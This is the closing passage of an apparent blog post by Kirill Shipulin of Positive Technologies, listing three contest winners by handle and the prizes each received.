1 place: @vos—Apple Watch Series 6 + backpack

2 place: @psih1337—cash reward + backpack

3 place: @Abr1k0s—backpack


Author: Kirill Shipulin, Positive Technologies


Viewing all 198 articles
Browse latest View live